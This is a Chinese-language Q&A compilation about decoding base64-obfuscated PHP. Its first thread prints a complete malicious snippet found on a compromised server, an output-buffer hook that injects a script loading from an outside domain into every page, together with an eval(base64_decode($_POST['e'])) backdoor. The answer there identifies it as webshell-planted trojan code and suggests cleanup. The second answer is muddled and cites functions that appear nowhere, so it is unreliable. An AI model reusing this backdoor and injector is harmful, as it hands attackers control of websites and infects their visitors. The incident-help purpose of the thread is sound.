① 幫忙解密php base64加密最好解決方案也提出下。100求破碼200求解決方案
if(!isset($ev8l1)){function ev8l($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a='<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ev8l2($a,$b,$c,$d){global $ev8l1;$s=array();if(function_exists($ev8l1))call_user_func($ev8l1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ev8l')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ev8l');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ev8ll=(($a=@set_error_handler('ev8l2'))!='ev8l2')?$a:0;eval(base64_decode($_POST['e']));
意思是將參數中的<script>...</script>部分替換為<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>,這樣你的網頁就被掛上了馬。這段代碼應該是通過webshell上傳到你機器上的一段掛馬程序,至於webshell 的打開有很多原因,即然是php代碼那麼你的機器上很可能存在php遠程文件包含漏洞,也就是如果你的機器上存在Wordtrans、WordPress、rgboard、phpcms等php程序,那麼很可能就有這個的漏洞。
推薦解決方法:
1.恢復已被篡改的網頁
2.找一個RFI掃描器對本機進行掃描,將找到的漏洞進行修補(相應的程序網上都有對應的修補方法)
② php base64 decode 解密
PHP中的Base64解密涉及到一系列函數的使用,其中關鍵的步驟是通過base64_decode函數對加密後的代碼進行解密。例如,代碼中的connect_sqlmysql($code)函數就是通過解碼Base64編碼來連接MySQL資料庫。另一個例子是met_encode函數,它接受編碼後的字元串作為輸入,使用base64_encode進行編碼處理。
在解密過程中,函數run_strtext($code)特別值得注意,它使用eval函數執行解密後的字元串,這可能會帶來安全風險,因為eval可以執行任意的PHP代碼。而strtoiower函數兩次出現,一次使用gzinflate解壓縮,一次使用gzdeflate進行壓縮,這可能是數據處理或混淆步驟的一部分。
解密的具體步驟和方法已通過郵件發送,建議您查看郵件獲取詳細內容。在處理此類操作時,務必注意代碼安全,特別是在使用eval時要謹慎,以防止潛在的安全威脅。
③ 求高手解密 base64 誰見過這樣的加密
原理其實很簡單,上面是用「|」分割的base64編碼過的字元串。首先將「|」替換為空去掉干擾,然後base64_decode得到源碼,然後eval執行。
不過從你復制的4|M「;看來,你應該是復制錯了。